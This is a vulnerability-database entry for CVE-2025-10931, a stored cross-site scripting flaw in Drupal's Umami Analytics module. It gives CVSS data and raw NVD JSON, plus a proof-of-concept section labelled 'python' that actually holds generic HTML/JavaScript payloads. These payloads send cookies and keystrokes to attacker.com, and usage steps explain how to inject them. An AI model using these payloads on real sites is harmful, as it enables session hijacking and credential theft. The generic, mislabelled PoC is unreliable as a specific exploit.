Security Vulnerability Report
中文
CVE-2025-10931 CVSS 3.8 LOW

CVE-2025-10931

Published: 2025-10-30 00:15:34
Last Modified: 2025-12-03 20:11:37
Source: [email protected]

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal Umami Analytics allows Cross-Site Scripting (XSS).This issue affects Umami Analytics: from 0.0.0 before 1.0.1.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:umami:umami_analytics:*:*:*:*:*:drupal:*:* - VULNERABLE
Umami Analytics < 1.0.1
Umami Analytics 0.0.0 - 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-10931 PoC - Stored XSS in Drupal Umami Analytics --> <!-- This PoC demonstrates the XSS vulnerability in Umami Analytics --> <!-- Method 1: Direct injection via analysis input field --> <script>alert('XSS - CVE-2025-10931')</script> <!-- Method 2: Cookie stealing payload --> <script>fetch('https://attacker.com/steal?c='+document.cookie)</script> <!-- Method 3: Session hijacking payload --> <img src=x onerror="this.src='https://attacker.com/log?cookie='+document.cookie"> <!-- Method 4: Keylogger payload --> <script>document.onkeypress=function(e){fetch('https://attacker.com/klog?k='+e.key)}</script> <!-- Usage: --> <!-- 1. Authenticate with high privilege access to Drupal --> <!-- 2. Navigate to Umami Analytics settings/input --> <!-- 3. Insert one of the above payloads --> <!-- 4. Save the configuration --> <!-- 5. When other users view the analytics page, the script executes -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10931", "sourceIdentifier": "[email protected]", "published": "2025-10-30T00:15:34.430", "lastModified": "2025-12-03T20:11:36.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal Umami Analytics allows Cross-Site Scripting (XSS).This issue affects Umami Analytics: from 0.0.0 before 1.0.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:umami:umami_analytics:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "1.0.1", "matchCriteriaId": "E465CB17-B128-402F-B390-CBC683580411"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2025-109", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.